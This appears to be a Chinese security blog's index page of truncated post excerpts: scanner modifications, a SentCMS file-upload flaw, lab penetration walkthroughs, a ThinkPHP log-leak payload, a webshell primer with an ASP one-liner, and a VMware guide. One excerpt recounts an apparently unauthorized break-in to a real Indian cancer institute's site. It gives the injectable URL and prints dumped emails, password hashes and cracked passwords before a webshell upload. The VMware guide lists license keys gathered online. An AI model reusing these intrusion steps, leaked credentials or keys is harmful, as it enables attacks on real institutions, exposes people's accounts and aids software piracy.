内网扫描神器Fscan的二次开发
内网扫描神器Fscan的二次开发
INFOhttps://github.com/h0nayuzu/Fscan_BaihuaSec/tree/main
version:1.7.0.1 BaihuaSec
Author:白桦Sec Hanayuzu
修改内容:
1.7.0.1
添加了vmware、spring4shell等5个POC
1.7.0.0
添加了来自xray社区的17个POC,部分未做测试,可能误报漏报
修改了默认扫描的web端口,添加了一些实际渗透中遇到过的端口
增加了一些默认弱口令账密
部分代码添加的注释
修改后的源码和编译文件:https://github.com/h0nayuzu/Fscan_BaihuaSec/tree/main
参考:
https://blog.csdn.net/qq_35476650/article/details/119536978
别的不说,go是真的啥也不会,写一点更一点
0、FSCAN架构模式
一、导入项目导入原版项目
1git clone https:/ ...
Sentcms任意文件上传漏洞
Unauthorized arbitrary file upload vulnerability in SentCMSGoogle Dork:sentcms
Exp methods :Vulnerability description: Arbitrary file uploads are possible without login
Vulnerability Location.
/user/upload/upload
/admin/upload/upload
Both of the above interfaces are vulnerable to arbitrary file uploads
If the following page appears, a vulnerability exists
Vulnerability recurrence:Modify the url at the pink arrow to be the home site, then post the package, and the successful upload will retur ...
三层内网靶场渗透笔记
使用了渗透攻击红队的靶场
因为校园网只允许一次登陆俩不同mac的机器,而且笔记本电脑连的wifi,导致weblogic机器不能走桥接,所以走了net
Weblogic机器地址为 192.168.160.128
四台靶机,一台kali 我16G的小机器真快吃不消了。
ok,下面就是正式开始了~
目标探测,外网打点首先,我们知道了目标的外网ip是 192.168.160.128
信息收集使用goby扫描常用端口,发现存在 port: 7001 、 5985
看到中间件是weblogic
使用weblogic漏洞扫描工具,发现[+]漏洞:CVE_2020_2551存在,返回信息:weblogic\administrator
查看是否存在杀软https://payloads.net/kill_software/
1powershell tasklist /svc
权限维持没有杀软,为了维持权限,决定上传一个webshell
根据以往经验,weblogic可以比较方便的fuzz路径,类似这种
先找一下绝对路径123powershell pwdC:\Oracle\Midd ...
内网渗透思路之常规外网打点拿下域控
内网渗透思路之常规外网打点拿下域控方法一:网络拓扑示意图:
信息收集:进入web界面,发现是一个贷款网站,使用thinkphp搭建
使用dirsearch发现存在 .svn 泄露
svn泄露下载源码:使用工具下载源码:svnExploit
https://github.com/admintony/svnExploit
1python3 SvnExploit.py -u http://www.webhack123.com/.svn/
审计发现存在账号密码,去后台登录发现不对
Thinkphp漏洞扫描:使用Thinkphp漏洞利用工具,发现存在
12[+] 存在ThinkPHP 3.x 日志泄露Payload: http://admin.webhack123.com//App/Runtime/Logs/21_12_17.log
使用thinkphp日志分析工具得到了两个hash字符串
12a7d3f5b6b9448d53e4078587b7f73378a1fdfe04 # admin6661d9f16d051848d54edbe9549efc585bc1564cb66 ...
记一次对印度某癌症研究所服务器的渗透
目标:奇塔兰詹国家癌症研究所
印度政府卫生与家庭福利部区域癌症中心
https://cnci.ac.in/index.php
通过谷歌语法,发现这里有传参,测试了下sql注入
https://cnci.ac.in/scientist_id.php/?id=16
然后使用sqlmap脱裤发现一个csv
12345678id,email,password,username9,mitraarijit1999@gmail.com,732fafb24ea23a65fb30c8e8bda8fdf6,mitraarijit1999@gmail.com10,admin@admin.com,9ed2ac50e3dc5d1cef065bc25d866bea,admin// 放到cmd5解一下# mitraarijit1999@gmail.com admincnci123# admin cnciadmin123
尝试登陆后台
成功进入
在后台寻找上传点,只能上传PDF,DOC。直接抓包改后缀传个一句话上去,一次连接成功
1https://cnci.ac.in/bmw_upload/u ...
境外渗透实战
18455f396d431ee82a7ff96f9fbe9faf9f56b701b71852f2084e4b209064363c9c1a8a7ea75bd296f534455710fc66989a15b24871b6940c6606b7bf5c12ff0a15f8fdee82d0ae8a7dab3c0bd7e4594bed8c4561f6fd30f382001baa93d14722150d31ce8b349c18ad57e6306e1283f9d0868410d28de1382ac506bddf237ff636eeedfb400f3739f1cc4fc53328b4ab162f97d1054fdbd834a357eab77ad52680d9970373e37a22a9ce96274ff6433419bd2abe3ab89f2b46a33c5c77baff4b39a9737e725dead9b7f541d61915a4e481ed1714eaf3f88751ecc570a8bdd0c34836c7386a22e432122e4f44f95400e4c8108e723b134857c ...
什么是Webshell&蚁剑
学习蚁剑什么是一句话木马, 大马, 小马各种webshell地址:https://github.com/tennc/webshell
webshell免杀解析:https://secvery.com/2105.html
蚁剑:https://github.com/AntSwordProject/antSword
哥斯拉:https://github.com/BeichenDream/Godzilla/
冰蝎:https://github.com/rebeyond/Behinder
首先它们都是webshell,初期webshell是留着给站长方便的,但是因为安全问题,它们不再被使用,而是被黑客用来连接服务器的后门。
webshell可以大致的分三类,一句话,小马,大马。
一句话木马一句话木马是最简单的,它的特点是,只有一句话(一行代码),它可以被穿插进别的代码里,但是因为特征明显,所以一般都是经过各种变形,加密使用来绕过waf检测。
常见一句话木马1234asp: <%eval request(“KEY”)%>php: & ...
安装VMware&kali_linux-面向萌新
一.VMware安装激活访问官网
https://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html
点击download now下载软件。
下载完成后一直点下一步安装,在密钥处填搜来的密钥
1234567ZF3R0-FHED2-M80TY-8QYGC-NPKYFYF390-0HF8P-M81RQ-2DXQE-M2UT6ZF71R-DMX85-08DQY-8YMNC-PPHV8前面的如果已经失效,用下面的FA1M0-89YE3-081TQ-AFNX9-NKUC0
因为以前安装过了,就不重复安装了。
详细点击[教程链接](https://new.qq.com/omn/20210507/20210507A09HPI00.html#:~:text=VMware16 Win10 64位安装步骤:,1,鼠标右键单击解压缩,在安装前断开计算机网络,然后查找VMware-Workstation-Full-16.0.exe,鼠标右键单击选择[作为管理员运行] 2,在安装文件中提取… 3,输入安装界面,单击 ...